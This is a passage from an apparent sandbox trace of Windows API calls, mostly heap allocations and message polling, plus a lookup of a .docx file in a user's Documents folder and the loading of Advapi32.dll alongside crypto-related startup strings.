(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0264.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0264.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0264.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0264.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0264.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.828] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kZP09G.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a307f0, ftCreationTime.dwHighDateTime=0x1d58c15, ftLastAccessTime.dwLowDateTime=0x6ea54c0, ftLastAccessTime.dwHighDateTime=0x1d59407, ftLastWriteTime.dwLowDateTime=0x6ea54c0, ftLastWriteTime.dwHighDateTime=0x1d59407, nFileSizeHigh=0x0, nFileSizeLow=0x5c4b, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="kZP09G.docx", cAlternateFileName="KZP09G~1.DOC")) returned 0xa87390 [0264.828] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0264.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.830] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.830] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0264.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.831] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.839] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.840] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.840] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0264.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.841] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.841] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 